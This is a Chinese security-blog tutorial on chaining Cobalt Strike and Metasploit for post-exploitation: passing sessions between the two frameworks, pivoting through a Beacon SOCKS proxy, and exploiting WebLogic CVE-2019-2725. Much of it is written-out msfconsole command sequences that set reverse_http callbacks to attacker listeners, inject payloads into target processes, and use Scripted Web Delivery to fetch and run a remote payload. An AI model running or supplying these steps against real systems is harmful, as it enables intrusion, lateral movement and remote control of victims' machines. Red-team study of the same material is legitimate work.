CobaltStrike 和 Metasploit 联动

admin 2021年5月29日04:10:46评论130 views字数 3113阅读10分22秒阅读模式

文章来源|MS08067 内网安全知识星球

本文作者:掉到鱼缸里的猫(Ms08067内网安全小组成员)

CobaltStrike 和 Metasploit 联动

内网纵横四海  认准Ms08067

CobaltStrike 和 Metasploit 联动


个人觉得CobaltStrike图形化的界面和丰富的功能,是一个超强的后渗透框架,尤其是方便管理横向移动过程中搜集到的各种数据和shell,但是对于漏洞利用、初始突破就显得十分乏力;另一边Metasploit作为漏洞利用框架,EXP及其顺滑,各种各样的模块,包含扫描、突破、拓展一条龙服务,但是对于多个shell的管理就显得有些乏力了(毕竟没有图形化界面,命令太多记不住)。于是,如何将两个框架有效的联动起来,就成为了今天想要学习的知识。



一.利用CSMSF服务

利用CSBeaconMSF派生一个shell,执行后续的渗透任务:

MSF中配置监听

# 配置监听器msf> use exploit/multi/handler# 选择payloadmsf> windows/meterpreter/reverse_httpmsf> set lhost IPmsf> set lport port# 启动监听器msf> set ExitOnSession Falsemsf> run -jz


CS中建立个外部监听器 Foreign HTTP (或 Foreign HTTPS

CobaltStrike 和 Metasploit 联动

 选择想要派生的目标,右键选择 spawn 功能,选择刚刚建立的监听器,即可在MSF中接收到回连。



利用CS为MSF提供转发或代理功能,进行后续的探测和漏洞利用:


利用Beacon建立 socks 代理:


Beacon中输入 socks 监听端口,或者右键想要作为转发的目标,在pivoting中选择 SOCKS Server ,配置监听端口后点击 launch 激活。


CobaltStrike 和 Metasploit 联动


 view -> Proxy Pivots 中可以看到建立的转发器,点击Tunnel即可获得MSF的转发命令


CobaltStrike 和 Metasploit 联动


复制到MSF中,设置代理和载荷类型

以CVE-2019-2725为测试靶机

#设置代理 msf> setg Proxies socks4:127.0.0.1:36725#配置payload,因为是隔离网段的主机,无法直接反连回MSF,所以需要换成被动连接的bind类型载荷msf> set payload windows/meterpreter/bind_tcpmsf> run


CobaltStrike 和 Metasploit 联动

二.MSFCS服务

主要就是使用MSF框架的EXP获取CS的Beacon


获取了一个命令执行Shell:


这是最简单的情况,也是最常见的情况,并不是所有的EXP都能反弹Meterpreter会话回来。


CS中利用Attacks -> Web Drive-by -> Scripted Web Delivery 来部署Payload分发站点:


配置监听器和URL路径,启动后会弹出相应的命令提示

CobaltStrike 和 Metasploit 联动

复制命令后,直接在MSF shell中执行即可

CobaltStrike 和 Metasploit 联动

命令执行后MSF的会话会卡住,可以直接kill掉,不影响CS会话



获取了一个Meterpreter会话:

获得meterpreter会话后,利用MSF注入功能,加载Cspayload

# 将meterpreter会话挂起meterpreter> background# 进入payload_inject模块msf> use exploit/windows/local/payload_inject# 根据CS监听器类型选择对应的payload(http或者https)msf> set payload windows/meterpreter/reverse_http# 设置回连地址(CS监听器地址)msf> set LHOST CS_IPmsf> set LPORT CS_PORT# 指定要执行的meterpreter会话msf> set session meterpreter会话ID# 设置MSF不启动监听(不然的话msf会提示执行成功,但没有会话建立,同时CS也不会接收到会话)msf> set disablepayloadhandler true msf> run


CobaltStrike 和 Metasploit 联动

在过程中发现,这种方法只能向注入32位的payload,如果注入64payload会导致目标进程崩溃,无法向64位程序中注入32payload崩溃原因是:APPCRASH(故障模块StackHash_af76),即使取得system权限、关闭UAC也还是不行。如果不设置pid,则会创建32位的notepad.exe进程,成功连接后记得及时迁移CS的会话进程。



直接反弹回CS:

MSF漏洞利用时直接请求并加载CS的载荷,和第二种方法基本致(测试漏洞为 CVE-2019-2725) 

# 根据CS监听器类型选择对应的payloadmsf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set payload windows/meterpreter/reverse_http # 设置回连地址(CS监听器地址) msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set LHOST CS_IPmsf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set LPORT CS_PORT# 指定要执行的meterpreter会话msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set session meterpreter会话ID# 设置MSF不启动监听(不然的话msf会提示执行成功,但没有会话建立,同时CS也不会接收到会话)msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set disablepayloadhandler true


CobaltStrike 和 Metasploit 联动

CobaltStrike 和 Metasploit 联动


其实和第二种操作是样,都是调用MSF的模块,配置payload的参数而已。漏洞利用成功后直接通过无窗口 powershell 返回CS会话,目标主机没有窗口弹出。测试的时候无法加载64payload,可能是这个漏洞利用后会启动32位的cmd.exe来执行后续命令的原因。



三.写在后面

      一开始打算是做篇学习笔记,毕竟好记性不如烂笔头,看过的东西长时间不使用的话可能就忘记了,留下个备忘录日后查询起来也方便。但是,做到后来就是个爬坑的过程了,觉得自己好聪明,这两个载荷名字好像,也没有文章提到,会不会也可联动呀?,因为网上介绍的方法(中文文章)基本上都是和CS官方2016年发布的指南的是样的,但是我看目前CSListener的种类不止 http和https ,还

dns smb tcp

MSF中也有诸如 

windows/meterpreter/reverse_tcp_dnswindows/meterpreter/bind_named_pipe windows/meterpreter/reverse_tcp 

这类看起来很像payload模块,番测试下来,也就只有httphttps载荷可以接收到另方回连的会话。果然还是是自己太年轻了,没有人提,确实就是因为它不是这样用的,毕竟两个框架开始就是独立的,这样成熟的框架之间能有联通的方法已经给面子了,开始就不应该奢求太多的。





扫描下方二维码加入星球学习

加入后邀请进入内部微信群,内部微信群永久有效!

CobaltStrike 和 Metasploit 联动 CobaltStrike 和 Metasploit 联动

CobaltStrike 和 Metasploit 联动CobaltStrike 和 Metasploit 联动

CobaltStrike 和 Metasploit 联动 CobaltStrike 和 Metasploit 联动

目前40000+人已关注加入我们

CobaltStrike 和 Metasploit 联动

本文始发于微信公众号(Ms08067安全实验室):CobaltStrike 和 Metasploit 联动

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年5月29日04:10:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CobaltStrike 和 Metasploit 联动http://cn-sec.com/archives/289992.html

发表评论

匿名网友 填写信息